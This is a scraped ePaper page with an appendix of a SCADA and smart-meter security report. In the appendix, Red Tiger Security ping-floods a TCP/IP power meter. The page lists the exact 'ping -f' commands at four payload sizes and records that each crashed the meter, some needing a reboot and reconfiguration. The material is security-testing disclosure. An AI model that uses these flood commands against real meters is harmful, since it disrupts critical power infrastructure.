11.07.2015 Views

Electricity for Free? The Dirty Underbelly of SCADA and Smart Meters

Electricity for Free? The Dirty Underbelly of SCADA and Smart Meters

Electricity for Free? The Dirty Underbelly of SCADA and Smart Meters

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Appendix B - Test Results with Typical Power Meter used inAMR systemsPING testRed Tiger Security conducted a similar PING test against a well-known power meter that usesTCP/IP <strong>for</strong> transmitting meter data. <strong>The</strong> team also tested the s<strong>of</strong>tware application that waspoling the meter. <strong>The</strong> PING testing will be ramped up from smaller packet size to larger packetsize, until the maximum packet size is reached. Typically this test is ran by sending 1000simultaneous PING packets at the following sizes to the target IP address:• 60 byte• 600 byte• 6,000 byte• 60,000 byte<strong>The</strong> actual comm<strong>and</strong>s used to create <strong>and</strong> send the PING tests are provided in the table below,as well as the results that the test had on the meter.comm<strong>and</strong> type Result test had on Meter Operationping -f 137.20.5.86 -s 60 Ping Flood with 60 bytesize payloadThis test crashed the METER. After the attack wasturned <strong>of</strong>f, it took about 3 minutes <strong>for</strong> the METERto recover on its own.ping -f 137.20.5.86 -s 600ping -f 137.20.5.86 -s 6000Ping Flood with 600 bytesize payloadPing Flood with 6,000 bytesize payloadThis test crashed the METER. After the attack wasturned <strong>of</strong>f, it took about 3 minutes <strong>for</strong> the METERto recover on its own.This test crashed the METER. After the attack wasturned <strong>of</strong>f, the METER never recovered on its own.<strong>The</strong> METER had to be rebooted, <strong>and</strong> then theconfiguration had to be reloaded into theMETER through a serial cable.ping -f 137.20.5.86 -s 60000Ping Flood with 60,000 bytesize payloadThis test crashed the METER. After the attack wasturned <strong>of</strong>f, the METER never recovered on its own.<strong>The</strong> METER had to be rebooted, <strong>and</strong> then theconfiguration had to be reloaded into theMETER through a serial cable.pg [ 23 ]

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!